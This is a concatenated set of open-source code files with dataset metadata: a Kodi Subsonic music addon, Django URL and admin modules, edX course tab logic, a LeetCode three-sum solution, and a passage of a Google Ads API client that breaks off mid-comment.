cls.DoesNotExist: return False def __unicode__(self): not_en = "Not " if self.email_enabled: not_en = "" return u"Course '{}': Instructor Email {}Enabled".format(self.course_id, not_en)
agpl-3.0
351,640,386,097,499,400
38.153025
121
0.668606
false
4.14076
false
false
false
xsteadfastx/subsonic-xbmc-addon
plugin.audio.subsonic/addon.py
1
11859
from operator import itemgetter import sys import urllib import urlparse sys.path.append('./resources/lib') import requests def build_url(query): return base_url + '?' + urllib.urlencode(dict([k.encode('utf-8'),unicode(v).encode('utf-8')] for k,v in query.items())) class Subsonic(object): def __init__(self, url, username, password): self.url = url self.username = username self.password = password def api(self, method, parameters={'none': 'none'}): return self.url + '/rest/' + method + '?u=%s&p=enc:%s&v=1.1.0&c=xbmc-subsonic&f=json&' % ( self.username, self.password.encode('hex')) + urllib.urlencode(parameters) def artist_list(self): api_url = self.api('getIndexes.view', parameters={'musicFolderId': '0'}) r = requests.get(api_url) artists = [] for index in r.json()['subsonic-response']['indexes']['index']: for artist in index['artist']: item = {} item['name'] = artist['name'].encode('utf-8') item['id'] = artist['id'].encode('utf-8') artists.append(item) return artists def music_directory_list(self, id): api_url = self.api('getMusicDirectory.view', parameters={'id': id}) r = requests.get(api_url) return r.json()['subsonic-response']['directory']['child'] def genre_list(self): api_url = self.api('getGenres.view') r = requests.get(api_url) return sorted(r.json()['subsonic-response']['genres']['genre'], key=itemgetter('value')) def albums_by_genre_list(self, genre): api_url = self.api('getAlbumList.view', parameters={'type': 'byGenre', 'genre': genre, 'size': '500'}) r = requests.get(api_url) return r.json()['subsonic-response']['albumList']['album'] def random_songs_by_genre(self, genre): api_url = self.api('getRandomSongs.view', parameters={'size': '500', 'genre': genre}) r = requests.get(api_url) return r.json()['subsonic-response']['randomSongs']['song'] def random_songs_from_to_year(self, from_year, to_year): api_url = self.api('getRandomSongs.view', parameters={'size': '500', 'fromYear': from_year, 'toYear': to_year}) r = requests.get(api_url) return r.json()['subsonic-response']['randomSongs']['song'] def cover_art(self, id): return self.api('getCoverArt.view', parameters={'id': id}) def main_page(): menu = [{'mode': 'artist_list', 'foldername': 'Artists'}, {'mode': 'genre_list', 'foldername': 'Genres'}, {'mode': 'random_list', 'foldername': 'Random'}] for entry in menu: url = build_url(entry) li = xbmcgui.ListItem(entry['foldername'], iconImage='DefaultFolder.png') xbmcplugin.addDirectoryItem( handle=addon_handle, url=url, listitem=li, isFolder=True) xbmcplugin.endOfDirectory(addon_handle) def genre_list(): subsonic = Subsonic(subsonic_url, username, password) genres = subsonic.genre_list() for genre in genres: url = build_url({'mode': 'albums_by_genre_list', 'foldername': genre['value']}) li = xbmcgui.ListItem(genre['value'], iconImage='DefaultFolder.png') xbmcplugin.addDirectoryItem( handle=addon_handle, url=url, listitem=li, isFolder=True) xbmcplugin.endOfDirectory(addon_handle) def albums_by_genre_list(): genre = args.get('foldername', None) subsonic = Subsonic(subsonic_url, username, password) albums = subsonic.albums_by_genre_list(genre[0]) for album in albums: url = build_url({'mode': 'track_list', 'foldername': unicode(album['title']).encode('utf-8'), 'album_id': unicode(album['id']).encode('utf-8')}) li = xbmcgui.ListItem(album['artist'] + ' - ' + album['title']) li.setIconImage(subsonic.cover_art(album['id'])) li.setThumbnailImage(subsonic.cover_art(album['id'])) li.setProperty('fanart_image', subsonic.cover_art(album['id'])) xbmcplugin.addDirectoryItem( handle=addon_handle, url=url, listitem=li, isFolder=True) xbmcplugin.endOfDirectory(addon_handle) def artist_list(): subsonic = Subsonic(subsonic_url, username, password) artists = subsonic.artist_list() for artist in artists: url = build_url({'mode': 'album_list', 'foldername': artist['name'], 'artist_id': artist['id']}) li = xbmcgui.ListItem(artist['name']) li.setIconImage(subsonic.cover_art(artist['id'])) li.setThumbnailImage(subsonic.cover_art(artist['id'])) li.setProperty('fanart_image', subsonic.cover_art(artist['id'])) xbmcplugin.addDirectoryItem( handle=addon_handle, url=url, listitem=li, isFolder=True) xbmcplugin.endOfDirectory(addon_handle) def album_list(): artist_id = args.get('artist_id', None) subsonic = Subsonic(subsonic_url, username, password) albums = subsonic.music_directory_list(artist_id[0]) for album in albums: url = build_url({'mode': 'track_list', 'foldername': unicode(album['title']).encode('utf-8'), 'album_id': unicode(album['id']).encode('utf-8')}) li = xbmcgui.ListItem(album['title']) li.setIconImage(subsonic.cover_art(album['id'])) li.setThumbnailImage(subsonic.cover_art(album['id'])) li.setProperty('fanart_image', subsonic.cover_art(album['id'])) xbmcplugin.addDirectoryItem( handle=addon_handle, url=url, listitem=li, isFolder=True) xbmcplugin.endOfDirectory(addon_handle) def track_list(): album_id = args.get('album_id', None) subsonic = Subsonic(subsonic_url, username, password) tracks = subsonic.music_directory_list(album_id[0]) for track in tracks: url = subsonic.api( 'stream.view', parameters={'id': track['id'], 'maxBitRate': bitrate, 'format': trans_format}) li = xbmcgui.ListItem(track['title']) li.setIconImage(subsonic.cover_art(track['id'])) li.setThumbnailImage(subsonic.cover_art(track['id'])) li.setProperty('fanart_image', subsonic.cover_art(track['id'])) li.setProperty('IsPlayable', 'true') li.setInfo( type='Music', infoLabels={'Artist': track['artist'], 'Title': track['title']}) xbmcplugin.addDirectoryItem( handle=addon_handle, url=url, listitem=li) xbmcplugin.endOfDirectory(addon_handle) def random_list(): menu = [{'mode': 'random_by_genre_list', 'foldername': 'by Genre'}, {'mode': 'random_from_to_year_list', 'foldername': 'from - to Year'}] for entry in menu: url = build_url(entry) li = xbmcgui.ListItem(entry['foldername'], iconImage='DefaultFolder.png') xbmcplugin.addDirectoryItem( handle=addon_handle, url=url, listitem=li, isFolder=True) xbmcplugin.endOfDirectory(addon_handle) def random_by_genre_list(): subsonic = Subsonic(subsonic_url, username, password) genres = subsonic.genre_list() for genre in genres: url = build_url({'mode': 'random_by_genre_track_list', 'foldername': genre['value']}) li = xbmcgui.ListItem(genre['value'], iconImage='DefaultFolder.png') xbmcplugin.addDirectoryItem( handle=addon_handle, url=url, listitem=li, isFolder=True) xbmcplugin.endOfDirectory(addon_handle) def random_by_genre_track_list(): genre = args.get('foldername', None)[0] subsonic = Subsonic(subsonic_url, username, password) tracks = subsonic.random_songs_by_genre(genre) for track in tracks: url = subsonic.api( 'stream.view', parameters={'id': track['id'], 'maxBitRate': bitrate, 'format': trans_format}) li = xbmcgui.ListItem(track['artist'] + ' - ' + track['title']) li.setIconImage(subsonic.cover_art(track['id'])) li.setThumbnailImage(subsonic.cover_art(track['id'])) li.setProperty('fanart_image', subsonic.cover_art(track['id'])) li.setProperty('IsPlayable', 'true') li.setInfo( type='Music', infoLabels={'Artist': track['artist'], 'Title': track['title']}) xbmcplugin.addDirectoryItem( handle=addon_handle, url=url, listitem=li) xbmcplugin.endOfDirectory(addon_handle) def random_from_to_year_list(): dialog = xbmcgui.Dialog() from_year = dialog.input('From Year', type=xbmcgui.INPUT_NUMERIC) dialog = xbmcgui.Dialog() to_year = dialog.input('To Year', type=xbmcgui.INPUT_NUMERIC) subsonic = Subsonic(subsonic_url, username, password) tracks = subsonic.random_songs_from_to_year(from_year, to_year) for track in tracks: url = subsonic.api( 'stream.view', parameters={'id': track['id'], 'maxBitRate': bitrate, 'format': trans_format}) li = xbmcgui.ListItem(track['artist'] + ' - ' + track['title']) li.setIconImage(subsonic.cover_art(track['id'])) li.setThumbnailImage(subsonic.cover_art(track['id'])) li.setProperty('fanart_image', subsonic.cover_art(track['id'])) li.setProperty('IsPlayable', 'true') li.setInfo( type='Music', infoLabels={'Artist': track['artist'], 'Title': track['title']}) xbmcplugin.addDirectoryItem( handle=addon_handle, url=url, listitem=li) xbmcplugin.endOfDirectory(addon_handle) if __name__ == '__main__': import xbmcaddon import xbmcgui import xbmcplugin my_addon = xbmcaddon.Addon('plugin.audio.subsonic') subsonic_url = my_addon.getSetting('subsonic_url') username = my_addon.getSetting('username') password = my_addon.getSetting('password') trans_format = my_addon.getSetting('format') bitrate = my_addon.getSetting('bitrate') base_url = sys.argv[0] addon_handle = int(sys.argv[1]) args = urlparse.parse_qs(sys.argv[2][1:]) xbmcplugin.setContent(addon_handle, 'songs') mode = args.get('mode', None) if mode is None: main_page() elif mode[0] == 'artist_list': artist_list() elif mode[0] == 'album_list': album_list() elif mode[0] == 'track_list': track_list() elif mode[0] == 'genre_list': genre_list() elif mode[0] == 'albums_by_genre_list': albums_by_genre_list() elif mode[0] == 'random_list': random_list() elif mode[0] == 'random_by_genre_list': random_by_genre_list() elif mode[0] == 'random_by_genre_track_list': random_by_genre_track_list() elif mode[0] == 'random_from_to_year_list': random_from_to_year_list()
mit
1,125,825,423,453,675,600
34.71988
123
0.559912
false
3.752848
false
false
false
CCallahanIV/PyChart
pychart/pychart_datarender/urls.py
1
1210
"""Url patterns for data render app.""" from django.conf.urls import url from pychart_datarender.views import ( GalleryView, DataDetailView, RenderDetailView, DataLibraryView, EditDataView, EditRenderView, AddDataView, AddRenderView, retrieve_data, render_data, save_render, add_owner_view ) urlpatterns = [ url(r'^gallery/$', GalleryView.as_view(), name='gallery'), url(r'^(?P<pk>\d+)/$', DataDetailView.as_view(), name='data_detail'), url(r'^render/(?P<pk>\d+)/$', RenderDetailView.as_view(), name='render_detail'), url(r'^(?P<pk>\d+)/edit/$', EditDataView.as_view(), name='data_edit'), url(r'^render/(?P<pk>\d+)/edit/$', EditRenderView.as_view(), name='render_edit'), url(r'^render/add/$', AddRenderView.as_view(), name='render_add'), url(r'^retrieve/(?P<pk>\d+)$', retrieve_data, name="get_data"), url(r'^retrieve/render/$', render_data, name="get_render"), url(r'^add/$', AddDataView.as_view(), name='data_add'), url(r'^add/(?P<pk>\d+)$', add_owner_view, name='add_owner'), url(r'^library/$', DataLibraryView.as_view(), name='data_library_view'), url(r'^render/create/$', save_render, name="save_render") ]
mit
-4,373,423,737,442,494,000
36.8125
85
0.628099
false
3.192612
false
false
false
lemming52/white_pawn
leetcode/q015/solution.py
1
1080
""" Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0? Find all unique triplets in the array which gives the sum of zero. Note: The solution set must not contain duplicate triplets. """ from typing import Dict, List class Solution: def threeSum(self, nums: List[int]) -> List[List[int]]: nums = sorted(nums) found = {} results = [] for i, a in enumerate(nums): j = i + 1 k = len(nums) - 1 if a > 0: break while j < k: b = nums[j] c = nums[k] total = a + b + c if total == 0: key = f"{a}{b}{c}" if not key in found: found[key] = True results.append([a, b, c]) j += 1 k -= 1 elif total > 0: k -= 1 else: j += 1 return results
mit
6,733,637,827,880,332,000
27.243243
161
0.39537
false
4.42623
false
false
false
jbassen/edx-platform
lms/djangoapps/courseware/tabs.py
1
10813
""" This module is essentially a broker to xmodule/tabs.py -- it was originally introduced to perform some LMS-specific tab display gymnastics for the Entrance Exams feature """ from django.conf import settings from django.utils.translation import ugettext as _, ugettext_noop from courseware.access import has_access from courseware.entrance_exams import user_must_complete_entrance_exam from student.models import UserProfile from openedx.core.lib.course_tabs import CourseTabPluginManager from student.models import CourseEnrollment from xmodule.tabs import CourseTab, CourseTabList, key_checker from xmodule.tabs import StaticTab class EnrolledTab(CourseTab): """ A base class for any view types that require a user to be enrolled. """ @classmethod def is_enabled(cls, course, user=None): if user is None: return True return bool(CourseEnrollment.is_enrolled(user, course.id) or has_access(user, 'staff', course, course.id)) class CoursewareTab(EnrolledTab): """ The main courseware view. """ type = 'courseware' title = ugettext_noop('Courseware') priority = 10 view_name = 'courseware' is_movable = False is_default = False is_visible_to_sneak_peek = True class CourseInfoTab(CourseTab): """ The course info view. """ type = 'course_info' title = ugettext_noop('Course Info') priority = 20 view_name = 'info' tab_id = 'info' is_movable = False is_default = False is_visible_to_sneak_peek = True @classmethod def is_enabled(cls, course, user=None): return True class SyllabusTab(EnrolledTab): """ A tab for the course syllabus. """ type = 'syllabus' title = ugettext_noop('Syllabus') priority = 30 view_name = 'syllabus' allow_multiple = True is_default = False is_visible_to_sneak_peek = True @classmethod def is_enabled(cls, course, user=None): if not super(SyllabusTab, cls).is_enabled(course, user=user): return False return getattr(course, 'syllabus_present', False) class ProgressTab(EnrolledTab): """ The course progress view. """ type = 'progress' title = ugettext_noop('Progress') priority = 40 view_name = 'progress' is_hideable = True is_default = False @classmethod def is_enabled(cls, course, user=None): # pylint: disable=unused-argument if not super(ProgressTab, cls).is_enabled(course, user=user): return False return not course.hide_progress_tab class TextbookTabsBase(CourseTab): """ Abstract class for textbook collection tabs classes. """ # Translators: 'Textbooks' refers to the tab in the course that leads to the course' textbooks title = ugettext_noop("Textbooks") is_collection = True is_default = False @classmethod def is_enabled(cls, course, user=None): # pylint: disable=unused-argument return user is None or user.is_authenticated() @classmethod def items(cls, course): """ A generator for iterating through all the SingleTextbookTab book objects associated with this collection of textbooks. """ raise NotImplementedError() class TextbookTabs(TextbookTabsBase): """ A tab representing the collection of all textbook tabs. """ type = 'textbooks' priority = None view_name = 'book' @classmethod def is_enabled(cls, course, user=None): # pylint: disable=unused-argument parent_is_enabled = super(TextbookTabs, cls).is_enabled(course, user) return settings.FEATURES.get('ENABLE_TEXTBOOK') and parent_is_enabled @classmethod def items(cls, course): for index, textbook in enumerate(course.textbooks): yield SingleTextbookTab( name=textbook.title, tab_id='textbook/{0}'.format(index), view_name=cls.view_name, index=index ) class PDFTextbookTabs(TextbookTabsBase): """ A tab representing the collection of all PDF textbook tabs. """ type = 'pdf_textbooks' priority = None view_name = 'pdf_book' @classmethod def items(cls, course): for index, textbook in enumerate(course.pdf_textbooks): yield SingleTextbookTab( name=textbook['tab_title'], tab_id='pdftextbook/{0}'.format(index), view_name=cls.view_name, index=index ) class HtmlTextbookTabs(TextbookTabsBase): """ A tab representing the collection of all Html textbook tabs. """ type = 'html_textbooks' priority = None view_name = 'html_book' @classmethod def items(cls, course): for index, textbook in enumerate(course.html_textbooks): yield SingleTextbookTab( name=textbook['tab_title'], tab_id='htmltextbook/{0}'.format(index), view_name=cls.view_name, index=index ) class LinkTab(CourseTab): """ Abstract class for tabs that contain external links. """ link_value = '' def __init__(self, tab_dict=None, name=None, link=None): self.link_value = tab_dict['link'] if tab_dict else link def link_value_func(_course, _reverse_func): """ Returns the link_value as the link. """ return self.link_value self.type = tab_dict['type'] tab_dict['link_func'] = link_value_func super(LinkTab, self).__init__(tab_dict) def __getitem__(self, key): if key == 'link': return self.link_value else: return super(LinkTab, self).__getitem__(key) def __setitem__(self, key, value): if key == 'link': self.link_value = value else: super(LinkTab, self).__setitem__(key, value) def to_json(self): to_json_val = super(LinkTab, self).to_json() to_json_val.update({'link': self.link_value}) return to_json_val def __eq__(self, other): if not super(LinkTab, self).__eq__(other): return False return self.link_value == other.get('link') @classmethod def is_enabled(cls, course, user=None): # pylint: disable=unused-argument return True class ExternalDiscussionCourseTab(LinkTab): """ A course tab that links to an external discussion service. """ type = 'external_discussion' # Translators: 'Discussion' refers to the tab in the courseware that leads to the discussion forums title = ugettext_noop('Discussion') priority = None is_default = False @classmethod def validate(cls, tab_dict, raise_error=True): """ Validate that the tab_dict for this course tab has the necessary information to render. """ return (super(ExternalDiscussionCourseTab, cls).validate(tab_dict, raise_error) and key_checker(['link'])(tab_dict, raise_error)) @classmethod def is_enabled(cls, course, user=None): # pylint: disable=unused-argument if not super(ExternalDiscussionCourseTab, cls).is_enabled(course, user=user): return False return course.discussion_link class ExternalLinkCourseTab(LinkTab): """ A course tab containing an external link. """ type = 'external_link' priority = None is_default = False # An external link tab is not added to a course by default allow_multiple = True @classmethod def validate(cls, tab_dict, raise_error=True): """ Validate that the tab_dict for this course tab has the necessary information to render. """ return (super(ExternalLinkCourseTab, cls).validate(tab_dict, raise_error) and key_checker(['link', 'name'])(tab_dict, raise_error)) class SingleTextbookTab(CourseTab): """ A tab representing a single textbook. It is created temporarily when enumerating all textbooks within a Textbook collection tab. It should not be serialized or persisted. """ type = 'single_textbook' is_movable = False is_collection_item = True priority = None def __init__(self, name, tab_id, view_name, index): def link_func(course, reverse_func, index=index): """ Constructs a link for textbooks from a view name, a course, and an index. """ return reverse_func(view_name, args=[unicode(course.id), index]) tab_dict = dict() tab_dict['name'] = name tab_dict['tab_id'] = tab_id tab_dict['link_func'] = link_func super(SingleTextbookTab, self).__init__(tab_dict) def to_json(self): raise NotImplementedError('SingleTextbookTab should not be serialized.') def get_course_tab_list(request, course): """ Retrieves the course tab list from xmodule.tabs and manipulates the set as necessary """ user = request.user is_user_enrolled = user.is_authenticated() and CourseEnrollment.is_enrolled(user, course.id) xmodule_tab_list = CourseTabList.iterate_displayable( course, user=user, settings=settings, is_user_authenticated=user.is_authenticated(), is_user_staff=has_access(user, 'staff', course, course.id), is_user_enrolled=is_user_enrolled, is_user_sneakpeek=not UserProfile.has_registered(user), ) # Now that we've loaded the tabs for this course, perform the Entrance Exam work. # If the user has to take an entrance exam, we'll need to hide away all but the # "Courseware" tab. The tab is then renamed as "Entrance Exam". course_tab_list = [] for tab in xmodule_tab_list: if user_must_complete_entrance_exam(request, user, course): # Hide all of the tabs except for 'Courseware' # Rename 'Courseware' tab to 'Entrance Exam' if tab.type is not 'courseware': continue tab.name = _("Entrance Exam") course_tab_list.append(tab) # Add in any dynamic tabs, i.e. those that are not persisted course_tab_list += _get_dynamic_tabs(course, user) return course_tab_list def _get_dynamic_tabs(course, user): """ Returns the dynamic tab types for the current user. Note: dynamic tabs are those that are not persisted in the course, but are instead added dynamically based upon the user's role. """ dynamic_tabs = list() for tab_type in CourseTabPluginManager.get_tab_types(): if getattr(tab_type, "is_dynamic", False): tab = tab_type(dict()) if tab.is_enabled(course, user=user): dynamic_tabs.append(tab) dynamic_tabs.sort(key=lambda dynamic_tab: dynamic_tab.name) return dynamic_tabs
agpl-3.0
6,793,054,819,562,622,000
30.896755
114
0.638121
false
3.950676
false
false
false
openpolis/op-verify
project/verify/admin.py
1
2315
from django.contrib import admin from django.core.management import call_command, CommandError from django.http import StreamingHttpResponse from .models import Rule, Verification __author__ = 'guglielmo' def run_verification(request, id): response = StreamingHttpResponse(stream_generator(request, id), content_type="text/html") return response def stream_generator(request, id): rule = Rule.objects.get(pk=id) yield "Verifying rule: %s ... <br/>" % rule # Returns a chunk of the response to the browser yield " " * 1000 try: call_command(rule.task, rule_id=rule.pk, verbosity='2', username=request.user.username) yield " Rule verification terminated. Status: {0}<br/>".format(rule.status) yield ' Go back to <a href="/admin/verify/rule/{0}">rule page</a>.<br/>'.format(rule.id) yield " " * 1000 except CommandError as e: yield " ! %s<br/>" % e yield " " * 1000 except Exception as e: yield " ! Error in execution: %s<br/>" % e yield " " * 1000 class VerificationInline(admin.TabularInline): model = Verification extra = 0 exclude = ('csv_report', ) list_display = readonly_fields = ('launch_ts', 'duration', 'outcome', 'user', 'csv_report_link', 'parameters') def get_queryset(self, request): return super(VerificationInline, self).get_queryset(request).order_by('-launch_ts') class RuleAdmin(admin.ModelAdmin): list_display = ['__unicode__', 'tags', 'status', 'last_launched_at', 'notes'] inlines = [VerificationInline,] search_fields = ['title', 'tags'] buttons = [ { 'url': 'run_verification', 'textname': 'Run verification', 'func': run_verification, }, ] def change_view(self, request, object_id, form_url='', extra_context={}): extra_context['buttons'] = self.buttons return super(RuleAdmin, self).change_view(request, object_id, form_url, extra_context=extra_context) def get_urls(self): from django.conf.urls import patterns, url, include urls = super(RuleAdmin, self).get_urls() my_urls = list( (url(r'^(.+)/%(url)s/$' % b, self.admin_site.admin_view(b['func'])) for b in self.buttons) ) return my_urls + urls admin.site.register(Rule, RuleAdmin)
bsd-3-clause
-7,814,162,677,733,859,000
35.746032
116
0.638013
false
3.639937
false
false
false
googleads/google-ads-python
google/ads/googleads/v8/services/services/ad_schedule_view_service/client.py
1
18238
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from collections import OrderedDict from distutils import util import os import re from typing import Dict, Optional, Sequence, Tuple, Type, Union from google.api_core import client_options as client_options_lib # type: ignore from google.api_core import exceptions as core_exceptions # type: ignore from google.api_core import gapic_v1 # type: ignore from google.api_core import retry as retries # type: ignore from google.auth import credentials as ga_credentials # type: ignore from google.auth.transport import mtls # type: ignore from google.auth.transport.grpc import SslCredentials # type: ignore from google.auth.exceptions import MutualTLSChannelError # type: ignore from google.oauth2 import service_account # type: ignore from google.ads.googleads.v8.resources.types import ad_schedule_view from google.ads.googleads.v8.services.types import ad_schedule_view_service from .transports.base import AdScheduleViewServiceTransport, DEFAULT_CLIENT_INFO from .transports.grpc import AdScheduleViewServiceGrpcTransport class AdScheduleViewServiceClientMeta(type): """Metaclass for the AdScheduleViewService client. This provides class-level methods for building and retrieving support objects (e.g. transport) without polluting the client instance objects. """ _transport_registry = ( OrderedDict() ) # type: Dict[str, Type[AdScheduleViewServiceTransport]] _transport_registry["grpc"] = AdScheduleViewServiceGrpcTransport def get_transport_class( cls, label: str = None, ) -> Type[AdScheduleViewServiceTransport]: """Return an appropriate transport class. Args: label: The name of the desired transport. If none is provided, then the first transport in the registry is used. Returns: The transport class to use. """ # If a specific transport is requested, return that one. if label: return cls._transport_registry[label] # No transport is requested; return the default (that is, the first one # in the dictionary). return next(iter(cls._transport_registry.values())) class AdScheduleViewServiceClient(metaclass=AdScheduleViewServiceClientMeta): """Service to fetch ad schedule views.""" @staticmethod def _get_default_mtls_endpoint(api_endpoint): """Convert api endpoint to mTLS endpoint. Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to "*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively. Args: api_endpoint (Optional[str]): the api endpoint to convert. Returns: str: converted mTLS api endpoint. """ if not api_endpoint: return api_endpoint mtls_endpoint_re = re.compile( r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?" ) m = mtls_endpoint_re.match(api_endpoint) name, mtls, sandbox, googledomain = m.groups() if mtls or not googledomain: return api_endpoint if sandbox: return api_endpoint.replace( "sandbox.googleapis.com", "mtls.sandbox.googleapis.com" ) return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com") DEFAULT_ENDPOINT = "googleads.googleapis.com" DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore DEFAULT_ENDPOINT ) @classmethod def from_service_account_info(cls, info: dict, *args, **kwargs): """Creates an instance of this client using the provided credentials info. Args: info (dict): The service account private key info. args: Additional arguments to pass to the constructor. kwargs: Additional arguments to pass to the constructor. Returns: AdScheduleViewServiceClient: The constructed client. """ credentials = service_account.Credentials.from_service_account_info( info ) kwargs["credentials"] = credentials return cls(*args, **kwargs) @classmethod def from_service_account_file(cls, filename: str, *args, **kwargs): """Creates an instance of this client using the provided credentials file. Args: filename (str): The path to the service account private key json file. args: Additional arguments to pass to the constructor. kwargs: Additional arguments to pass to the constructor. Returns: AdScheduleViewServiceClient: The constructed client. """ credentials = service_account.Credentials.from_service_account_file( filename ) kwargs["credentials"] = credentials return cls(*args, **kwargs) from_service_account_json = from_service_account_file @property def transport(self) -> AdScheduleViewServiceTransport: """Return the transport used by the client instance. Returns: AdScheduleViewServiceTransport: The transport used by the client instance. """ return self._transport @staticmethod def ad_schedule_view_path( customer_id: str, campaign_id: str, criterion_id: str, ) -> str: """Return a fully-qualified ad_schedule_view string.""" return "customers/{customer_id}/adScheduleViews/{campaign_id}~{criterion_id}".format( customer_id=customer_id, campaign_id=campaign_id, criterion_id=criterion_id, ) @staticmethod def parse_ad_schedule_view_path(path: str) -> Dict[str, str]: """Parse a ad_schedule_view path into its component segments.""" m = re.match( r"^customers/(?P<customer_id>.+?)/adScheduleViews/(?P<campaign_id>.+?)~(?P<criterion_id>.+?)$", path, ) return m.groupdict() if m else {} @staticmethod def common_billing_account_path(billing_account: str,) -> str: """Return a fully-qualified billing_account string.""" return "billingAccounts/{billing_account}".format( billing_account=billing_account, ) @staticmethod def parse_common_billing_account_path(path: str) -> Dict[str, str]: """Parse a billing_account path into its component segments.""" m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path) return m.groupdict() if m else {} @staticmethod def common_folder_path(folder: str,) -> str: """Return a fully-qualified folder string.""" return "folders/{folder}".format(folder=folder,) @staticmethod def parse_common_folder_path(path: str) -> Dict[str, str]: """Parse a folder path into its component segments.""" m = re.match(r"^folders/(?P<folder>.+?)$", path) return m.groupdict() if m else {} @staticmethod def common_organization_path(organization: str,) -> str: """Return a fully-qualified organization string.""" return "organizations/{organization}".format(organization=organization,) @staticmethod def parse_common_organization_path(path: str) -> Dict[str, str]: """Parse a organization path into its component segments.""" m = re.match(r"^organizations/(?P<organization>.+?)$", path) return m.groupdict() if m else {} @staticmethod def common_project_path(project: str,) -> str: """Return a fully-qualified project string.""" return "projects/{project}".format(project=project,) @staticmethod def parse_common_project_path(path: str) -> Dict[str, str]: """Parse a project path into its component segments.""" m = re.match(r"^projects/(?P<project>.+?)$", path) return m.groupdict() if m else {} @staticmethod def common_location_path(project: str, location: str,) -> str: """Return a fully-qualified location string.""" return "projects/{project}/locations/{location}".format( project=project, location=location, ) @staticmethod def parse_common_location_path(path: str) -> Dict[str, str]: """Parse a location path into its component segments.""" m = re.match( r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path ) return m.groupdict() if m else {} def __init__( self, *, credentials: Optional[ga_credentials.Credentials] = None, transport: Union[str, AdScheduleViewServiceTransport, None] = None, client_options: Optional[client_options_lib.ClientOptions] = None, client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO, ) -> None: """Instantiate the ad schedule view service client. Args: credentials (Optional[google.auth.credentials.Credentials]): The authorization credentials to attach to requests. These credentials identify the application to the service; if none are specified, the client will attempt to ascertain the credentials from the environment. transport (Union[str, ~.AdScheduleViewServiceTransport]): The transport to use. If set to None, a transport is chosen automatically. client_options (google.api_core.client_options.ClientOptions): Custom options for the client. It won't take effect if a ``transport`` instance is provided. (1) The ``api_endpoint`` property can be used to override the default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT environment variable can also be used to override the endpoint: "always" (always use the default mTLS endpoint), "never" (always use the default regular endpoint) and "auto" (auto switch to the default mTLS endpoint if client certificate is present, this is the default value). However, the ``api_endpoint`` property takes precedence if provided. (2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable is "true", then the ``client_cert_source`` property can be used to provide client certificate for mutual TLS transport. If not provided, the default SSL client certificate will be used if present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not set, no client certificate will be used. client_info (google.api_core.gapic_v1.client_info.ClientInfo): The client info used to send a user-agent string along with API requests. If ``None``, then default info will be used. Generally, you only need to set this if you're developing your own client library. Raises: google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport creation failed for any reason. """ if isinstance(client_options, dict): client_options = client_options_lib.from_dict(client_options) if client_options is None: client_options = client_options_lib.ClientOptions() # Create SSL credentials for mutual TLS if needed. use_client_cert = bool( util.strtobool( os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false") ) ) ssl_credentials = None is_mtls = False if use_client_cert: if client_options.client_cert_source: import grpc # type: ignore cert, key = client_options.client_cert_source() ssl_credentials = grpc.ssl_channel_credentials( certificate_chain=cert, private_key=key ) is_mtls = True else: creds = SslCredentials() is_mtls = creds.is_mtls ssl_credentials = creds.ssl_credentials if is_mtls else None # Figure out which api endpoint to use. if client_options.api_endpoint is not None: api_endpoint = client_options.api_endpoint else: use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto") if use_mtls_env == "never": api_endpoint = self.DEFAULT_ENDPOINT elif use_mtls_env == "always": api_endpoint = self.DEFAULT_MTLS_ENDPOINT elif use_mtls_env == "auto": api_endpoint = ( self.DEFAULT_MTLS_ENDPOINT if is_mtls else self.DEFAULT_ENDPOINT ) else: raise MutualTLSChannelError( "Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always" ) # Save or instantiate the transport. # Ordinarily, we provide the transport, but allowing a custom transport # instance provides an extensibility point for unusual situations. if isinstance(transport, AdScheduleViewServiceTransport): # transport is a AdScheduleViewServiceTransport instance. if credentials: raise ValueError( "When providing a transport instance, " "provide its credentials directly." ) self._transport = transport elif isinstance(transport, str): Transport = type(self).get_transport_class(transport) self._transport = Transport( credentials=credentials, host=self.DEFAULT_ENDPOINT ) else: self._transport = AdScheduleViewServiceGrpcTransport( credentials=credentials, host=api_endpoint, ssl_channel_credentials=ssl_credentials, client_info=client_info, ) def get_ad_schedule_view( self, request: ad_schedule_view_service.GetAdScheduleViewRequest = None, *, resource_name: str = None, retry: retries.Retry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> ad_schedule_view.AdScheduleView: r"""Returns the requested ad schedule view in full detail. List of thrown errors: `AuthenticationError <>`__ `AuthorizationError <>`__ `HeaderError <>`__ `InternalError <>`__ `QuotaError <>`__ `RequestError <>`__ Args: request (:class:`google.ads.googleads.v8.services.types.GetAdScheduleViewRequest`): The request object. Request message for [AdScheduleViewService.GetAdScheduleView][google.ads.googleads.v8.services.AdScheduleViewService.GetAdScheduleView]. resource_name (:class:`str`): Required. The resource name of the ad schedule view to fetch. This corresponds to the ``resource_name`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.ads.googleads.v8.resources.types.AdScheduleView: An ad schedule view summarizes the performance of campaigns by AdSchedule criteria. """ # Create or coerce a 